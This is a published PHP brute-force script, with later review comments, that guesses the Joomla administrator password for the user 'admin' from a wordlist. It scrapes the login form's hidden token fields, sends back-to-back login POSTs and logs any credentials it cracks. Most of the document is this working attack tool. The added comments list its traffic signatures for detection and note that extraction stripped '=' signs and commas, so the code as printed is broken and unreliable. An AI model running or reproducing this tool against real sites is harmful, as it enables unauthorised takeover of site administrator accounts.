
Joomla Brute By Rodrigo "N4sss"

Author: n4sss , Published: 07-06-2014

    


    <?php
     
    
/**
    *
    * Joomla Brute By Rodrigo "N4sss"
    *
    * Use: php joomla_brute.php site pass_file
    * Last release bruted: 3.3.0
    * OOP to better manipulation of data. Edit if you want :)
    *
    * Contact: n-l4b[noSPAM]hotmail[dot]com
    *
    * http://Janissaries.org
    *
    **/
     
     
    
// Removes PHP's execution time limit, so a run lasts as long as the wordlist does.
set_time_limit(0);
    
// Reports every PHP notice and warning on the console.
error_reporting(E_ALL);
     
     
    /**
     * Password-guessing client for the Joomla administrator login form
     * (/administrator/index.php), driven from a wordlist file.
     *
     * NOTE(review): this listing lost characters in extraction (the "=" of
     * assignments and the commas between arguments are missing), so it is not
     * valid PHP as shown. The code below is left exactly as published.
     *
     * Traffic this code produces, as visible in the listing (useful for
     * detection and log review):
     *  - one GET of the login page, then one POST per wordlist line to the
     *    same path, with no delay between attempts;
     *  - a fixed username ("admin") and a fixed Firefox 29 User-Agent string;
     *  - POST fields username, passwd, option=com_login, task=login;
     *  - a single cookie jar and a single set of hidden-field values, fetched
     *    once and reused for every attempt.
     * Login throttling or lockout, a second authentication factor, and
     * restricting access to the administrator path all interrupt this pattern.
     */
    Class 
JoomlaBrute{
     
            // Account name tried with every password; fixed, not taken from the command line.
            var 
$user 'admin';
            // File, relative to the working directory, that a successful guess is appended to.
            var 
$log 'ok_joomla.txt';
            // Matches the hidden <input> elements of the login page.
            var 
$regex '#<input type=\"hidden\" (.*?)/>#';
            // Captures the name of a hidden field whose value is "1"
            // (presumably the form token; confirm against the target form).
            var 
$hashRegex '#name=\"(.*?)\" value=\"1\"#';
            // Captures the value of the hidden "return" field.
            var 
$returnRegex '#name=\"return\" value=\"(.*?)\"#';
            // curl cookie jar, relative to the working directory; deleted in __destruct().
            var 
$cookieContainer 'nx.cookie';
            // Seconds; used for curl's connect timeout, and for the total timeout of the first GET only.
            var 
$timeout 5;
            // Login endpoint appended to the target URL.
            var 
$path '/administrator/index.php';
            // Constant User-Agent header sent with every request.
            var 
$userAgent 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0';
            // Run-time state from here down, filled in by the methods below.
            var 
$url null;
            var 
$wordlist null;
            var 
$httpResponse null;
            var 
$date null;
            var 
$hash null;
            var 
$returnValue null;
     
     
            /**
             * Stores the target and the wordlist path, prints a banner and starts
             * the run: post() is called from here, so constructing the object
             * performs all of the network activity.
             */
            function 
__construct($url$wordlist){
                    
$this->url $url;
                    
$this->wordlist $wordlist;
                    
printf("\nPHP Joomla Brute by n4sss\n\n- Uri: %s\n- User: %s\n- Wordlist: %s\n- Log: %s\n\n Wait and Good Luck!\n\n"$this->url$this->user$this->wordlist$this->log);
                    
$this->post();
            }
     
            /**
             * Deletes the cookie jar file and prints a completion message.
             * The log file is not removed here, so a log written after a
             * successful guess stays in the working directory.
             */
            function 
__destruct(){
                    
unlink($this->cookieContainer);
                    
printf("Finished!\n");
                    
flush();
            }
     
            /**
             * Appends $content followed by CRLF to $file (opened in "a+" mode).
             * The fopen() result is not checked before it is used.
             */
            function 
save_buf($content$file){
                    
$fp fopen($file"a+");
                    
fwrite($fp$content."\r\n");
                    
fclose($fp);
            }
     
            /**
             * Fetches the login page (url + path) with curl, using the shared
             * cookie jar, and stores the response body in $this->httpResponse.
             *
             * NOTE(review): post() adds the "http://" prefix only after this
             * method has run, so this first request uses the URL exactly as it
             * was given on the command line. The curl handle is not closed in
             * the visible code.
             */
            function 
connect(){
                    
$ch curl_init();
                    
curl_setopt($chCURLOPT_URL$this->url.$this->path);
                    
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                    
curl_setopt($chCURLOPT_COOKIEJAR$this->cookieContainer);
                    
curl_setopt($chCURLOPT_COOKIEFILE$this->cookieContainer);
                    
curl_setopt($chCURLOPT_USERAGENT$this->userAgent);
                    
curl_setopt($chCURLOPT_TIMEOUT$this->timeout);
                    
curl_setopt($chCURLOPT_CONNECTTIMEOUT$this->timeout);
                    
$this->httpResponse curl_exec($ch);
            }
     
            /**
             * Fetches the login page and pulls two hidden-field values out of it:
             * a field name whose value is "1" (stored in $this->hash) and the
             * "return" value (stored in $this->returnValue). Both are read by
             * fixed position in the list of hidden inputs (indexes 3 and 2), and
             * the empty-bodied foreach loops leave the last match in each
             * property. The script exits when either value is empty.
             *
             * NOTE(review): the exit message is single-quoted, so its \n
             * sequences are printed literally rather than as newlines.
             */
            function 
parse_connection(){
                    
$this->connect();
                    
preg_match_all($this->regex$this->httpResponse$parse);
                    
preg_match_all($this->hashRegex$parse[1][3], $parse_hash);
                    
preg_match_all($this->returnRegex$parse[1][2], $parse_returnValue);
                    foreach(
$parse_hash[1] as $this->hash);
                    foreach(
$parse_returnValue[1] as $this->returnValue);
                    if(!
$this->hash || !$this->returnValue) exit('[-] Impossible to retrieve login hash\nExiting!\n');
                    
flush();
            }
     
            /**
             * Runs the guessing loop. parse_connection() is called once; then,
             * for every wordlist line that array_filter() keeps, a form POST is
             * sent to url + path with the fixed username, the candidate password
             * and the hidden-field values captured earlier. Redirects are
             * followed. A response body containing "com_config" is treated as a
             * successful login: the URI, the credentials and a timestamp are
             * printed and appended to the log file, and the loop stops.
             *
             * NOTE(review): $this->date is set once before the loop, so the
             * logged time is when the run started, not when the match occurred.
             */
            function 
post(){
                    
$this->parse_connection();
                    
$this->date date("F j, Y, H:i:s a");
                    if(!
preg_match("/http/"$this->url)) $this->url "http://".$this->url;
                    
$uri $this->url.$this->path;
                    
$wordlist array_filter(explode("\n"file_get_contents($this->wordlist)));
                    // One login POST per wordlist entry, sent back-to-back with no pause.
                    foreach(
$wordlist as $password){
                            
$postContent "username={$this->user}&passwd={$password}&lang=&option=com_login&task=login&return={$this->returnValue}&{$this->hash}=1";
                            
printf("%s %s:%s\n"$this->url$this->user$password);
                            
$ch curl_init();
                            
curl_setopt($chCURLOPT_URL$uri);
                            
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
                            
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                            
curl_setopt($chCURLOPT_COOKIEJAR$this->cookieContainer);
                            
curl_setopt($chCURLOPT_COOKIEFILE$this->cookieContainer);
                            
curl_setopt($chCURLOPT_POST1);
                            
curl_setopt($chCURLOPT_USERAGENT$this->userAgent);
                            
curl_setopt($chCURLOPT_POSTFIELDS$postContent);
                            
curl_setopt($chCURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
                            
curl_setopt($chCURLOPT_CONNECTTIMEOUT$this->timeout);
                            
$this->httpResponse curl_exec($ch);
                            // Success check: the reply body is searched for the string "com_config".
                            if(
preg_match("/com_config/"$this->httpResponse)){
                                    
$response "+-----------------------+\n";
                                    
$response .= "[Uri] {$uri}\n";
                                    
$response .= "[Auth] {$this->user}:{$password}\n";
                                    
$response .= "[Date] {$this->date}\n";
                                    
$response .= "+-----------------------+\n";
                                    print 
"{$response}\n";
                                    
$this->save_buf($response$this->log);
                                    
flush();
                                    break;
                            }
                    }
            }
    }
     
    // Command-line entry point: requires two arguments, the target host and the
    // wordlist path. Both are trimmed and handed to JoomlaBrute, whose constructor
    // runs the whole session; with fewer arguments only a usage line is printed.
    if(isset(
$argv[1], $argv[2])){
            
$host trim($argv[1]);
            
$wordlist trim($argv[2]);
            
$joomlaBrute = new JoomlaBrute($host$wordlist);
    }else{
            
printf("php %s host wordlist\n"$argv[0]);
    }
     
    
?>
